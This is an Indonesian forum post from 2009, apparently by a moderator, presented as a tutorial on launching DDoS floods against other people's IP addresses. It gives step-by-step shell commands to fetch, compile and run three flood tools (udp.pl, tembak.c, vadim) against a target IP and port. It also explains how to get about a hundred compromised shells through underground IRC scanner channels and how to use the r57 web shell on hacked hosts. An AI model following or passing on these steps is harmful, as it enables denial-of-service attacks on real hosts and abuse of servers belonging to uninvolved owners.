Talking About Everything

PortalHomeMemberlistGalleryFAQSearchRegisterLog in
December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar
Search
 
 

Display results as :
 
Rechercher Advanced Search
Navigation
 Portal
 Index
 Memberlist
 Profile
 User Group
Latest topics
Yahoo Search Engine

Share | 
 

 Susah di Boot coba aja begini <^__^>

View previous topic View next topic Go down 
AuthorMessage
chanorudin
Moderators
Moderators



PostSubject: Susah di Boot coba aja begini <^__^>   Sat Jun 20, 2009 12:50 am

Mudah2an manfaat ya ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ngacir
Berikut ini tutorial cara nembak ip orang atau istilah kerenya ddos ada beberapa tools yg sering digunakan untuk menembak ip orang….saya harap tutorial ini jangan pernah anda praktekkan kecuali lagi terpaksa atau anda di dzolimi orang.... wkkwkwkkwkkw <^__^>

syarat pertama ada harus punya shell yang banyak biar manteb tu ddos nya jangan tanggung2 ( (100 shell aja cukup.... siy!!)

Ada 3 cara yang saya tau, sebenernya banyak jalan menuju roma siy
mari kita mencobanya !!

Cara 1.>> udp.pl

1. wget [You must be registered and logged in to see this link.]
mv udp.txt .udp.pl
chmod 755 .udp.pl
2. perl .udp.pl (ip) (port) (timer)
contoh :

perl udp.txt 212.111.11.11 80 99999999999999999999

Cara 2.>> Tembak.c

1. wget [You must be registered and logged in to see this link.]
2. gcc -o tembak tembak.c
3. ./tembak (ip) (port)
contoh :

./tembak 212.111.11.11 80

Cara 3.>> VADIM

wget [You must be registered and logged in to see this link.]

tar zxvf vadim.TGZ

cd flood

./vadimII [IP.target] [PORT] 10 0

contoh :

./vadimII 212.111.11.11 80

biasanya cara kedua lebih manjur,

:yihi: Sekedar tambahan ya,,,, buat yang kesulitan nyari shells
kamu scan sendiri di channel² underground mirc. cara nya buka program mirc ketik /server irc.allindoserv.net 6667 atau /server irc.mildnet.org 6667 kemudian ketik /join #scanner btw, masi banyak lagi server dan channel lain kamu cari sendiri aja ya...... book

Saya akan jelasin dengan cara kedua aja ya,, kayak nya masih banyak yang bingung ya,,???

:hore: Alat2 perang yang dibutuhkan:
=> hosting gratis seperti geocities atau zoomshare aja atau semacamnya lah. Kalo ripway saya sarankan jangan, tar kalo admin nya tau file kita di hapus. Yang belom punya silakan daftar dulu, gak usah tergesa² hehehe
=> r57.txt
=> tembak.c
=> udp.txt
=> vadim.tgz
Simpan semua file di atas ke hostingan gratis kamu, jika udah di save, lalu rename/edit sesuai dengan yang saya ketik di atas. OK..... sampe di sini mudah2an ngerti serang
- baru kemudian kita masuk ke shells,,,,,!!!!
nah sekarang coba buka browsingan anda kemudian copy shells yang anda dapet tadi,,,,
kalo udah?? kemudian taruh r57 kamu di belakang url shells tadi terakhir ketik tanda tanya ? jadi nya seperti ini [You must be registered and logged in to see this link.]

Mudah2an pusing jd gak di ikutin deh langkah2nya..... ~p :relax:
cara nembak IP orang lumayan ribet klo lom pernah nyoba tapi antisipasinya cukup mudah koq ??? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ngacir
[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
View user profile
 
Susah di Boot coba aja begini <^__^>
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Butler Boot Camp
» Charity Shops & Car Boot sales in and around Leeds
» DRAGON BOOT SALE AND AUCTION
» Making Boot-Prints on AFVs
» SSM GOZO CAR BOOT SALE

Permissions in this forum:You cannot reply to topics in this forum
 :: INTERNET :: Tutorial, Tips & Trik-
Jump to:  
Free forum | Art, Culture and Leisures | Hobbies - Others | © phpBB | Free forum support | Contact | Report an abuse | Free forum